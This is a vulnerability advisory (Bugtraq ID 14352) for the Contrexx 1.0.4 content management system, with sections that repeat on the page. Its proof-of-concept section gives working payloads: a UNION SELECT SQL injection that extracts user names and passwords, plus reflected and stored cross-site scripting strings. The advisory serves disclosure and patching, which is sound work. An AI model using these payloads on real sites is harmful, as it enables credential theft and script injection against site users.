Contrexx Multiple Input Validation Vulnerabilities
BID:14352
Info
Contrexx Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 14352 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 22 2005 12:00AM |
| Updated: | Jul 22 2005 12:00AM |
| Credit: | Discovery is credited to Christopher Kunz with Hardened PHP Project. |
| Vulnerable: |
Contrexx Contrexx 1.0.4 |
| Not Vulnerable: |
Contrexx Contrexx 1.0.5 |
Discussion
Contrexx Multiple Input Validation Vulnerabilities
Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks.
Contrexx versions prior to 1.0.5 are affected.
Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks.
Contrexx versions prior to 1.0.5 are affected.
Exploit / POC
Contrexx Multiple Input Validation Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form.
/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users
/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E
Create a blog entry with the title <script>alert('xss')</script>
An exploit is not required.
The following proof of concept examples are available:
supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form.
/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users
/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E
Create a blog entry with the title <script>alert('xss')</script>
Solution / Fix
Contrexx Multiple Input Validation Vulnerabilities
Solution:
The vendor has released upgrades to address these issues. Please contact the vendor to obtain the fixes.
Solution:
The vendor has released upgrades to address these issues. Please contact the vendor to obtain the fixes.